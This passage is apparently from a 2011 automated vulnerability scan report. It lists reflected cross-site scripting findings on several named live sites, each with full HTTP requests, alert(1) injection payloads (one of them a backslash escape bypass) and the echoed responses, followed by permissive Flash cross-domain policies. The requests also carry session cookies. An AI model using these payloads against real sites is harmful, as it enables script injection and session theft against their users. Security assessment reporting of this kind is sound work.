User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:05:13 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://www.nanpa.org/forums/external.phpe2cef<script>alert(1)</script>253b7e5f1c8</span>
...[SNIP]...

3.26. http://www.nanpa.org/viewers/scroller_x.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nanpa.org
Path:   /viewers/scroller_x.swf

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9c54e<script>alert(1)</script>0e0f6e0a5f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /viewers9c54e<script>alert(1)</script>0e0f6e0a5f2/scroller_x.swf HTTP/1.1
Host: www.nanpa.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:13:46 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://www.nanpa.org/viewers9c54e<script>alert(1)</script>0e0f6e0a5f2/scroller_x.swf</span>
...[SNIP]...

3.27. http://www.nanpa.org/viewers/scroller_x.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nanpa.org
Path:   /viewers/scroller_x.swf

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9721a<script>alert(1)</script>37549e4044d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /viewers/scroller_x.swf9721a<script>alert(1)</script>37549e4044d HTTP/1.1
Host: www.nanpa.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:13:49 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://www.nanpa.org/viewers/scroller_x.swf9721a<script>alert(1)</script>37549e4044d</span>
...[SNIP]...

3.28. https://www.nationalnanpa.com/nas/security/user_reg_pre_mail.do [userStageModel.emailAddr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.nationalnanpa.com
Path:   /nas/security/user_reg_pre_mail.do

Issue detail

The value of the userStageModel.emailAddr request parameter is copied into the HTML document as plain text between tags. The payload 24c54<script>alert(1)</script>508ccbd11b05bf3ba was submitted in the userStageModel.emailAddr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /nas/security/user_reg_pre_mail.do;nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596?method=subscribeMailUser&nnsStateListHidden=AK&userStageModel.emailAddr=24c54<script>alert(1)</script>508ccbd11b05bf3ba HTTP/1.1
Host: www.nationalnanpa.com
Connection: keep-alive
Referer: https://www.nationalnanpa.com/nas/security/user_reg_mail.do?method=createNewMode
Cache-Control: max-age=0
Origin: https://www.nationalnanpa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:43 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 13476


<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...
<li>24c54<script>alert(1)</script>508ccbd11b05bf3ba is an invalid e-mail address.</li>
...[SNIP]...

3.29. http://www.redskye911.com/e911_information_center/default.aspx [_TSM_HiddenField_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.redskye911.com
Path:   /e911_information_center/default.aspx

Issue detail

The value of the _TSM_HiddenField_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a54f5\'%3balert(1)//7b4e3c0ecf3 was submitted in the _TSM_HiddenField_ parameter. This input was echoed as a54f5\\';alert(1)//7b4e3c0ecf3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /e911_information_center/default.aspx?_TSM_HiddenField_=ctl00_pageWebinarInfoForm_ctl00_HiddenFielda54f5\'%3balert(1)//7b4e3c0ecf3&_TSM_CombinedScripts_=%3b%3bAjaxControlToolkit%2c+Version%3d3.0.31106.0%2c+Culture%3dneutral%2c+PublicKeyToken%3d28f01b0e84b6d53e%3aen-US%3a79be4cda-496c-4ec3-9619-b4d32086b3b9%3ade1feab2%3af9cec9bc%3a35576c48 HTTP/1.1
Host: www.redskye911.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_information_center/
Cookie: ASP.NET_SessionId=1bw3xe552lbj2j551tb0bb55; kilo_boat_cid=911078775; tz=5; __utma=112137735.110952242.1305162418.1305162418.1305162418.1; __utmb=112137735.2.10.1305162418; __utmc=112137735; __utmz=112137735.1305162418.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=a449df2-12fe1be4def-5e2048d0-1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:09:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Fri, 11 May 2012 01:09:32 GMT
Last-Modified: Thu, 20 Jan 2011 20:17:09 GMT
Content-Type: application/x-javascript
Content-Length: 47738

//START Common.Common.js
(function(){var scriptName="ExtendedCommon";function execute(){var u="WatermarkChanged",t="HTML",s="BODY",r="hiddenInputToUpdateATBuffer_CommonToolkitScripts",q="HTMLEvents",
...[SNIP]...
)();
//END TextboxWatermark.TextboxWatermark.js
if(typeof(Sys)!=='undefined')Sys.Application.notifyScriptLoaded();
(function() {var fn = function() {$get('ctl00_pageWebinarInfoForm_ctl00_HiddenFielda54f5\\';alert(1)//7b4e3c0ecf3').value += ';;AjaxControlToolkit, Version=3.0.31106.0, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-US:79be4cda-496c-4ec3-9619-b4d32086b3b9:de1feab2:f9cec9bc:35576c48';Sys.Application.remove_lo
...[SNIP]...

3.30. http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://connectedplanetonline.com
Path:   /bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d3cb"-alert(1)-"6b2f9ae4ade was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/ HTTP/1.1
Host: connectedplanetonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=8d3cb"-alert(1)-"6b2f9ae4ade

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:47:02 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Content-Type: text/html
Content-Length: 53341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
s-0422/index.html" //doc uri
s.prop9="By Joan Engebretson" // byline
s.prop10="Apr 22, 2011 12:42 PM"
status="200"
if (status == "404")
{
s.referrer="http://www.google.com/search?hl=en&q=8d3cb"-alert(1)-"6b2f9ae4ade"
s.pageType="errorPage"
    s.pageName=location.href

}
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

3.31. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 8c930<script>alert(1)</script>3871f157ceb was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.redskye911.com%2Fe911_products%2F&jsref=http%3A%2F%2Fwww.redskye911.com%2F&rnd=1305162438995 HTTP/1.1
Host: seg.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_products/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==8c930<script>alert(1)</script>3871f157ceb

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Thu, 12 May 2011 01:07:21 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspjoE3JR6aX8hTKEPglAg==8c930<script>alert(1)</script>3871f157ceb
userid:
</div>
...[SNIP]...

4. Flash cross-domain policy  previous  next
There are 30 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Thu, 12 May 2011 00:47:35 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.2. http://altfarm.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Thu, 12 May 2011 00:47:55 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.3. http://api.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Sat, 11 Jun 2011 00:48:12 GMT
X-FB-Server: 10.42.55.43
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

4.4. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 01:07:20 GMT
Date: Thu, 12 May 2011 01:07:20 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.5. http://by.optimost.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://by.optimost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: by.optimost.com

Response

HTTP/1.0 200 OK
Server: Fast
Content-Type: text/xml
Content-Length: 200
Accept-Ranges: bytes
Last-Modified: Thu, 30 Sep 2010 23:09:18 GMT
Expires: Thu, 12 May 2011 00:50:36 GMT
Pragma: no-cache
Date: Thu, 12 May 2011 00:50:36 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.6. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Wed, 11 May 2011 02:38:40 GMT
Expires: Sat, 30 Apr 2011 02:36:16 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 79921
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.7. http://img.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:48:00 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1b1f-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.8. http://metrics.connectedplanetonline.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.connectedplanetonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.connectedplanetonline.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:47:47 GMT
Server: Omniture DC/2.0.0
xserver: www80
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.9. http://metrics.sprint.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.sprint.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:32 GMT
Server: Omniture DC/2.0.0
xserver: www62
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.10. http://metrics.vonage.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.vonage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.vonage.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:50:42 GMT
Server: Omniture DC/2.0.0
xserver: www27
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.11. http://now.eloqua.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Thu, 12 May 2011 00:46:53 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.12. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Fri, 13 May 2011 00:48:44 GMT
Content-Type: text/xml
Content-Length: 207
Date: Thu, 12 May 2011 00:48:44 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.13. http://api.demandbase.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.demandbase.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.demandbase.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Thu, 12 May 2011 00:46:49 GMT
ETag: "248c48f-113-4a13e63e774c0"
Last-Modified: Tue, 19 Apr 2011 05:00:43 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 275
Connection: Close

<cross-domain-policy>
<allow-access-from domain="*.demandbase.com" to-ports="80,443" secure="false" />
<allow-access-from domain="*.fireraven.com" to-ports="80,443" secure="false" />
<site-contr
...[SNIP]...

4.14. http://api.tweetmeme.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 12 May 2011 00:48:11 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Thu, 12 May 2011 00:48:56 +0000 GMT
Etag: ffad005467e43bdd2b8b4291a00ba33b
X-Served-By: h01

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...

4.15. http://cdn.stumble-upon.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cdn.stumble-upon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.stumble-upon.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 18 Oct 2010 23:13:32 GMT
Content-Type: application/xml
Content-Length: 460
Date: Thu, 12 May 2011 00:48:22 GMT
Connection: close

<?xml version="1.0"?>
